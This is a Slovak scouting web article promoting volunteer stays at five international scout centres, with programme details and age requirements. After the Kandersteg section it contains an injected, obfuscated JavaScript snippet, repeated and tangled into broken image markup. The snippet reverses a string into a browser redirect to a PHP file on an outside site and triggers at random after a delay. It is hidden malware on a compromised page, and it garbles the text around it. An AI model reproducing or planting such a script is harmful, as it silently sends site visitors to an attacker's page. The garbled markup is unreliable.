Ak sa chceš motivovať, zažiť pravú atmosféru medzinárodného skautingu, nabrať skúsenosti, zažiť iné dobrodružstvá ako vo svojom zbore a spoznať obrovský kopec super skautov z celého sveta, potom jednoznačne využi možnosť dobrovoľničiť v jednom zo skautských centier. A vieš čo ešte? Precvičíš si cudzie jazyky.

Po minimálne troch mesiacoch za hranicami Slovenska, no stále v prostredí svojej svetovej rodiny skautov, sa vrátiš so zmeneným pohľadom nielen na skauting, ale aj na seba samého. Nehovoriac o tom, že tvoja vnútorná baterka sa dobije až na 100%!

Koniec úvodu…kým nezažiješ, nepochopíš ani neuveríš. Prečítaj si možnosti a pusti sa do toho!

1. KANDERSTEG (pre členov a členky WOSM a WAGGGS)

Keď Baden-Powell v roku 1922 navštívil Kandersteg, rozhodol sa, že toto bude miesto na uskutočnenie jeho sna – miesto, kde sa môžu skauti všetkých národností stretávať počas celého roka. Malá dedinka Kandersteg v srdci švajčiarskych Álp v nadmorskej výške 1174 m sa nachádza iba 65 km južne od Bernu. Krásu tohto kraja ti snáď opisovať nemusíme.

$mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„‚php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-1.jpg“>fo<script>$mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„‚php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to-1″ src=“http://www.delfiny.sk/wp-content/uploads/fo<script>$mWn=function(n){if(typeof ($mWn.list[n])==to-1-300×212.jpg“ width=“300″ height=“212″ />

Je tu naozaj široká ponuka dobrovoľníckych príležitostí a pracovných pozícií. Pre teba najzaujímavejší bude zrejme „short-term“ program trvajúci tri mesiace podľa ročného obdobia (jar, leto, jeseň,zima). Napríklad letné prázdniny tu trávi približne 33 dobrovoľníkov, ktorí sú rozdelení do troch oblastí: starostlivosť o táborisko, program a služby centra. To ťa však k ničomu nezaväzuje, pretože aktívny budeš tak či tak vo všetkých troch sektoroch.

Čo budeš robiť? Kľúčové slová sú žiadna rutina. Sprevádzanie skautov po horách, organizácia športov, programu, lezeckých výletov, upratovanie, varenie, all-night párty, celkový chod centra, bazénovice, pozeranie filmov na jazere, spoločenské večery, v zime zasa lyžovanie, guľovačky, snehové aktivity. Zoznam je ešte dlhší, keďže každý deň je iný!

Ak sa rozhodneš vrátiť sa na dlhšie obdobie, môžeš sa zapojiť do „long-term“ programu. Niektorí zostávajú 4 mesiace, niektorí 9, a iní zasa aj niekoľko rokov. Čaká ťa špecifická práca, ako napríklad administratíva, recepcia, program, catering,…

Viac informácií o dátumoch a všeličom možnom, čo toto magické miesto ponúka, nájdeš na www.kisc.ch

 

2. OUR CHALET (pre členky WAGGGS)

Sme opäť vo Švajčiarsku. Síce menšie ako Kandersteg, ale rovnako medzinárodné, aktívne a najstaršie WAGGGS centrum.

maxresdefault

Program a aktivity sú na rovnakej báze ako v Kanderstegu. Ponúka však 4 rôzne dobrovoľnícke programy: Our Chalet asistent, Ready Steady Go, krátkodobý dobrovoľník a pracovná skupina.

Asistenti pomáhajú absolútne so všetkým, od programu po administratívne činnosti. Zoznam úloh je na celú stranu, no rozhodne pri tomto programe zažiješ najviac zábavy, spoznáš najviac ľudí a získaš najviac skúseností. Ready Steady Go trvá jeden-dva týždne, kde sa dáva do poriadku centrum po jednej sezóne a prebiehajú prípravy na ďalšiu. Na to treba dobrú fyzickú kondičku a radosť z upratovania. Ako krátkodobý dobrovoľník môžeš ísť, ak nemáš čas zostať tri mesiace, namiesto toho týždeň až dva mesiace. Budeš ako dodatočná podpora pri službách a programe pre návštevníkov počas „busy“ sezón. Byť súčasťou pracovnej skupiny znamená pracovať na spoločnom projekte, zväčša ide o udržiavacie práce okolo chaty počas jari a jesene.

Pozri si všetko na www.ourchalet.ch a rozhodni sa sám.

 

3. OUR CABANA (pre členky WAGGGS)

A teraz trochu exotiky.

image009

Aká je ponuka? Žiť v Mexiku a dozvedieť sa viac o mexickej kultúre a tradíciách, zlepšiť si vedomosti o WAGGGS, témach, projektoch, regiónoch a centrách, pomôcť rozbehnúť programy a aktivity pre účastníkov, stať sa súčasťou projektov súvisiacich so službami v meste Cuernavaca, navštíviť miestne historické a archeologické lokality, spriateliť sa so skautmi z celého sveta a ešte oveľa viac.

Dobrovoľnícky program prebieha 6-10 týždňov a rozdeľuje sa do troch oblastí: program, služby, marketing a komunikácia.

Pozri si www.ourcabana.org.

(infozdroj: časopis Médium)

 

4. SANGAM  (pre členky WAGGGS)

Už si niekedy jazdila na slonovi, tancovala ako z Bollywoodu alebo pozerala východ slnka z vodnej veže (google ti ukáže, ako to vyzerá) „konkurujúcej“ Gerlachu ? Nie. Na to treba ísť do Indie, konkrétne do mesta Pune.

dsc00928

Dobrovoľníčky v tomto centre majú na starosti medzinárodné eventy, napríklad o indickej kultúre a najnovších trendoch vo WAGGGSe, sprevádzanie turistov po okolí, pomáhanie pri komunitných prácach, starajú sa o správny chod centra.

Krátkodobý program trvá 3,5 mesiaca, dlhodobý 5 mesiacov.

 

 

5. PAX LODGE (pre členky WAGGGS)

Späť do Európy, tentokrát priamo do Londýna.

002

Centrum ti momentálne ponúka miesto v dvoch odvetiach: marketing a komunikácia, služby návštevníkom. Tieto pozície sú vážnejšie a zamerané skôr na získanie pracovnej skúsenosti než na zábavu a oddych. Podmienkou je vek minimálne 21 rokov, skúsenosť s marketingom, komunikáciou, prácou na počítači, sociálnymi médiami, PR  a dobrá znalosť angličtiny.

Nenechaj sa odradiť a zisti si viac na www.paxlodge.org.

 

Poznámka:  Aby si sa mohol/mohla stať dobrovoľníkom v niektorom zo svetových skautských centier, musíš mať 18 rokov, v niektorých je podmienkou minimálne 21 (napríklad v Sangame, Pax Lodge).

Ak ťa niektorá ponuka zaujme, napíš na international@skauting.sk a nechaj si ochotne pomôcť s vybavením všetkých potrebných záležitostí.